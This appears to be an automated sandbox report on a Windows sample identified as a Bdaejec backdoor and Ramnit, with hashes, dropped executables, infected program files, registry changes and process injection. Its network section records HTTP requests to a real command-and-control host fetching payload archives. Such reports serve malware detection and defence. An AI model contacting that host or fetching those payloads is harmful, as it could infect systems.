Analysis
-
max time kernel
110s -
max time network
122s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11/12/2024, 02:53 UTC
General
-
Target
f33872774e26dd5224a50c7a855ac4cb6c002d2e9c75dde9235814279dae89fbN.exe
-
Size
71KB
-
MD5
8335cc2b5669fe55b594b69ac8c814e0
-
SHA1
72f11c65623cd87812a2e49ee189b126e3c9fd8a
-
SHA256
f33872774e26dd5224a50c7a855ac4cb6c002d2e9c75dde9235814279dae89fb
-
SHA512
bcb7a3e08aa98121499ff1dd5e0932d1bf0b7bcd269ca12eb84bf7a4757b8520a51f8e54c471d97373ec646dbcf7ca33f67be9e04b088cf29f8ea93afd2e8074
-
SSDEEP
1536:T+hzRsibKplyXTq8OGRnsPFG+RODTb7MXL5uXZnzEksGCq2iW7z:iROzoTq0+RO7IwnYJGCH
Malware Config
Extracted
bdaejec
ddos.dnsnb8.net
Signatures
-
Bdaejec family
-
Detects Bdaejec Backdoor. 1 IoCs
Bdaejec is backdoor written in C++.
resource yara_rule behavioral1/memory/4976-45-0x0000000000D10000-0x0000000000D19000-memory.dmp family_bdaejec_backdoor -
Ramnit family
-
resource yara_rule behavioral1/files/0x000c000000023b92-3.dat aspack_v212_v242 -
Executes dropped EXE 2 IoCs
pid Process 4976 SgnMPh.exe 4676 DesktopLayer.exe -
resource yara_rule behavioral1/memory/2320-0-0x0000000000400000-0x0000000000433000-memory.dmp upx behavioral1/memory/2320-9-0x0000000000400000-0x0000000000433000-memory.dmp upx behavioral1/files/0x0008000000023c85-12.dat upx behavioral1/memory/4676-13-0x0000000000400000-0x0000000000433000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\bin\jstack.exe SgnMPh.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\tnameserv.exe SgnMPh.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection64.exe SgnMPh.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxCalendarAppImm.exe SgnMPh.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\XboxApp.exe SgnMPh.exe File opened for modification C:\Program Files (x86)\Microsoft\pxA364.tmp f33872774e26dd5224a50c7a855ac4cb6c002d2e9c75dde9235814279dae89fbN.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jstatd.exe SgnMPh.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\keytool.exe SgnMPh.exe File opened for modification C:\Program Files\Windows Photo Viewer\ImagingDevices.exe SgnMPh.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe SgnMPh.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe SgnMPh.exe File opened for modification C:\Program Files (x86)\Windows Mail\wab.exe SgnMPh.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javafxpackager.exe SgnMPh.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\rmid.exe SgnMPh.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DWTRIG20.EXE SgnMPh.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\PeopleApp.exe SgnMPh.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe SgnMPh.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\ktab.exe SgnMPh.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe SgnMPh.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\extcheck.exe SgnMPh.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE SgnMPh.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\officeappguardwin32.exe SgnMPh.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\VPREVIEW.EXE SgnMPh.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\serialver.exe SgnMPh.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\unpack200.exe SgnMPh.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe SgnMPh.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe SgnMPh.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\kinit.exe SgnMPh.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PPTICO.EXE SgnMPh.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Solitaire.exe SgnMPh.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe SgnMPh.exe File opened for modification C:\Program Files\Google\Chrome\Application\chrome_proxy.exe SgnMPh.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe SgnMPh.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE SgnMPh.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\pack200.exe SgnMPh.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOHTMED.EXE SgnMPh.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PDFREFLOW.EXE SgnMPh.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\native2ascii.exe SgnMPh.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\CLVIEW.EXE SgnMPh.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe SgnMPh.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msotd.exe SgnMPh.exe File opened for modification C:\Program Files (x86)\Google\Update\Install\{87F23B05-A117-4666-BB8C-A9C77E6BFB56}\chrome_installer.exe SgnMPh.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\servertool.exe SgnMPh.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\rmic.exe SgnMPh.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\rmid.exe SgnMPh.exe File opened for modification C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate64.exe SgnMPh.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exe SgnMPh.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe SgnMPh.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe SgnMPh.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\jabswitch.exe SgnMPh.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE SgnMPh.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe SgnMPh.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Time.exe SgnMPh.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\xjc.exe SgnMPh.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerElevatedAppServiceClient.exe SgnMPh.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe SgnMPh.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\tnameserv.exe SgnMPh.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe SgnMPh.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe SgnMPh.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Wordconv.exe SgnMPh.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe SgnMPh.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxTsr.exe SgnMPh.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\policytool.exe SgnMPh.exe File opened for modification C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\123.0.6312.123\chrome_installer.exe SgnMPh.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f33872774e26dd5224a50c7a855ac4cb6c002d2e9c75dde9235814279dae89fbN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SgnMPh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DesktopLayer.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{29C3E002-B76B-11EF-A4B7-E6FB6C85BB83} = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4264545717" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31148919" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4269545707" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "4264545717" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31148919" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31148919" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "440650611" iexplore.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4676 DesktopLayer.exe 4676 DesktopLayer.exe 4676 DesktopLayer.exe 4676 DesktopLayer.exe 4676 DesktopLayer.exe 4676 DesktopLayer.exe 4676 DesktopLayer.exe 4676 DesktopLayer.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4032 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 4032 iexplore.exe 4032 iexplore.exe 3540 IEXPLORE.EXE 3540 IEXPLORE.EXE 3540 IEXPLORE.EXE 3540 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2320 wrote to memory of 4976 2320 f33872774e26dd5224a50c7a855ac4cb6c002d2e9c75dde9235814279dae89fbN.exe 82 PID 2320 wrote to memory of 4976 2320 f33872774e26dd5224a50c7a855ac4cb6c002d2e9c75dde9235814279dae89fbN.exe 82 PID 2320 wrote to memory of 4976 2320 f33872774e26dd5224a50c7a855ac4cb6c002d2e9c75dde9235814279dae89fbN.exe 82 PID 2320 wrote to memory of 4676 2320 f33872774e26dd5224a50c7a855ac4cb6c002d2e9c75dde9235814279dae89fbN.exe 83 PID 2320 wrote to memory of 4676 2320 f33872774e26dd5224a50c7a855ac4cb6c002d2e9c75dde9235814279dae89fbN.exe 83 PID 2320 wrote to memory of 4676 2320 f33872774e26dd5224a50c7a855ac4cb6c002d2e9c75dde9235814279dae89fbN.exe 83 PID 4676 wrote to memory of 4032 4676 DesktopLayer.exe 84 PID 4676 wrote to memory of 4032 4676 DesktopLayer.exe 84 PID 4032 wrote to memory of 3540 4032 iexplore.exe 85 PID 4032 wrote to memory of 3540 4032 iexplore.exe 85 PID 4032 wrote to memory of 3540 4032 iexplore.exe 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\f33872774e26dd5224a50c7a855ac4cb6c002d2e9c75dde9235814279dae89fbN.exe"C:\Users\Admin\AppData\Local\Temp\f33872774e26dd5224a50c7a855ac4cb6c002d2e9c75dde9235814279dae89fbN.exe"1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Users\Admin\AppData\Local\Temp\SgnMPh.exeC:\Users\Admin\AppData\Local\Temp\SgnMPh.exe2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4976
-
-
C:\Program Files (x86)\Microsoft\DesktopLayer.exe"C:\Program Files (x86)\Microsoft\DesktopLayer.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4032 CREDAT:17410 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3540
-
-
-
Network
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request154.239.44.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestddos.dnsnb8.netIN AResponseddos.dnsnb8.netIN A44.221.84.105
-
Remote address:44.221.84.105:799RequestGET /cj//k1.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address:44.221.84.105:799RequestGET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address:8.8.8.8:53Request134.130.81.91.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request105.84.221.44.in-addr.arpaIN PTRResponse105.84.221.44.in-addr.arpaIN PTRec2-44-221-84-105 compute-1 amazonawscom
-
Remote address:44.221.84.105:799RequestGET /cj//k3.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address:44.221.84.105:799RequestGET /cj//k4.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address:44.221.84.105:799RequestGET /cj//k5.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address:8.8.8.8:53Requestapi.bing.comIN AResponseapi.bing.comIN CNAMEapi-bing-com.e-0001.e-msedge.netapi-bing-com.e-0001.e-msedge.netIN CNAMEe-0001.e-msedge.nete-0001.e-msedge.netIN A13.107.5.80
-
Remote address:8.8.8.8:53Request22.160.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request196.249.167.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request53.210.109.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request161.19.199.152.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request241.42.69.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request133.130.81.91.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.214.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request200.197.79.204.in-addr.arpaIN PTRResponse200.197.79.204.in-addr.arpaIN PTRa-0001a-msedgenet
-
Remote address:8.8.8.8:53Request30.243.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request83.210.23.2.in-addr.arpaIN PTRResponse83.210.23.2.in-addr.arpaIN PTRa2-23-210-83deploystaticakamaitechnologiescom
-
564 B 296 B 6 7
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k1.rar -
564 B 296 B 6 7
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k2.rar -
564 B 296 B 6 7
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k3.rar -
564 B 296 B 6 7
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k4.rar -
3.4kB 312 B 17 6
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k5.rar -
260 B 5
-
260 B 5
-
260 B 5
-
1.2kB 8.3kB 16 14
-
260 B 5
-
208 B 4
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
154.239.44.20.in-addr.arpa
-
61 B 77 B 1 1
DNS Request
ddos.dnsnb8.net
DNS Response
44.221.84.105
-
72 B 147 B 1 1
DNS Request
134.130.81.91.in-addr.arpa
-
72 B 127 B 1 1
DNS Request
105.84.221.44.in-addr.arpa
-
58 B 134 B 1 1
DNS Request
api.bing.com
DNS Response
13.107.5.80
-
72 B 158 B 1 1
DNS Request
22.160.190.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
196.249.167.52.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
53.210.109.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
161.19.199.152.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
241.42.69.40.in-addr.arpa
-
72 B 147 B 1 1
DNS Request
133.130.81.91.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
-
73 B 106 B 1 1
DNS Request
200.197.79.204.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
30.243.111.52.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
83.210.23.2.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
71KB
MD58335cc2b5669fe55b594b69ac8c814e0
SHA172f11c65623cd87812a2e49ee189b126e3c9fd8a
SHA256f33872774e26dd5224a50c7a855ac4cb6c002d2e9c75dde9235814279dae89fb
SHA512bcb7a3e08aa98121499ff1dd5e0932d1bf0b7bcd269ca12eb84bf7a4757b8520a51f8e54c471d97373ec646dbcf7ca33f67be9e04b088cf29f8ea93afd2e8074
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize471B
MD587f8376b71b1fd35da4b511eff055888
SHA10c55fba0aa699282bbe4d129dd0ba16d4e377ce9
SHA256a1383ed3b4f8967fb19f5b16bfe41eb3242b296ffc06c1098fbe1d1a04a7003f
SHA5128556ed20a3d9daf8f74b2eceaab6a3773b69d5c9524ba8dbb8af1ad64b2235165e487c41646e357be5906aaa7f0f4c57ff8dc9ea2acc0c87f443d3ad083c9031
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize404B
MD5f680c360423cf2585d75b7110f0507d1
SHA1287d9c40a08ed5a0d2f517520af74c94c4e2c9a8
SHA256f0409aeb183f9f00176b749b1487dc9c5615905f9d67f01455d629f842b8a837
SHA512b20df284f534825c038275c5c810fcfd298dbe3aada8377f8bb1832cfe7ad09936550813015200fe7613e667128c6798e953a99a576eb498f6d5787f115835f1
-
Filesize
4B
MD5d3b07384d113edec49eaa6238ad5ff00
SHA1f1d2d2f924e986ac86fdf7b36c94bcdf32beec15
SHA256b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c
SHA5120cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
4B
MD520879c987e2f9a916e578386d499f629
SHA1c7b33ddcc42361fdb847036fc07e880b81935d5d
SHA2569f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31
SHA512bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f
-
Filesize
15KB
MD556b2c3810dba2e939a8bb9fa36d3cf96
SHA199ee31cd4b0d6a4b62779da36e0eeecdd80589fc
SHA2564354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07
SHA51227812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e